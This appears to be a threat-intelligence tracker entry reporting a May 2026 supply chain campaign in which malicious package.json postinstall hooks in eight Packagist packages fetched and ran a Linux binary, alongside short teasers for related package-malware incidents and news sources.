Packagist package.json hook supply chain attack campaign
Campaign
Summary
Hide ▲
Show ▼
A coordinated supply chain attack campaign compromised eight Packagist packages, creating repeat execution risk for projects that install the affected versions. The malicious code hid in package.json lifecycle hooks rather than composer metadata, which could evade PHP-focused review. The installer then fetched a Linux binary from GitHub Releases, saved it as /tmp/.sshd, and ran it in the background.
Related Happenings
TrapDoor trap-core.js credential-stealing package malware
Malware Activity
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor trap-core.js credential-stealing package malware
Malware ActivityAbout this happening: The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor cross-ecosystem supply-chain campaign
Campaign
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...
TrapDoor cross-ecosystem supply-chain campaign
CampaignAbout this happening: The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...
Laravel Lang credential-stealer dropper delivered through malicious Composer packages
Malware Activity
First: 23.05.2026 23:48
Last: 23.05.2026 23:48
Sources 1
About this happening:
A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...
Laravel Lang credential-stealer dropper delivered through malicious Composer packages
Malware ActivityAbout this happening: A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...
Laravel Lang organization hit by network compromise
Incident
First: 23.05.2026 23:48
Last: 23.05.2026 23:48
Sources 1
About this happening:
The **Laravel Lang organization** suffered a **repository compromise** that let attackers rewrite **GitHub tags** and ship malicious code through **Composer** installs. The affect...
Laravel Lang organization hit by network compromise
IncidentAbout this happening: The **Laravel Lang organization** suffered a **repository compromise** that let attackers rewrite **GitHub tags** and ship malicious code through **Composer** installs. The affect...
Shai-Hulud worm clone activity on NPM
Malware Activity
First: 18.05.2026 12:45
Last: 18.05.2026 12:45
Sources 1
About this happening:
The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...
Shai-Hulud worm clone activity on NPM
Malware ActivityAbout this happening: The **Shai-Hulud** malware activity has continued to evolve across the **npm supply chain** and related developer ecosystems. It first infected **npm packages** in **September 202...
Timeline
-
23.05.2026 19:07 2 articles · 4d ago
Packagist supply chain campaign disclosed
Initial DisclosureA coordinated supply chain campaign targeted eight Packagist packages by placing malicious code in package.json lifecycle hooks instead of composer.json, using postinstall scripts to download a Linux binary from a GitHub Releases URL, save it as /tmp/.sshd, grant execute permissions, and run it in the background. The affected packages were later removed from Packagist, and related references to the same payload were also found across 777 GitHub files and in at least two GitHub Actions workflows, indicating broader reuse of the malicious installer.
Show sources
- Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware — thehackernews.com — 23.05.2026 19:07
- Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware — thehackernews.com — 23.05.2026 19:07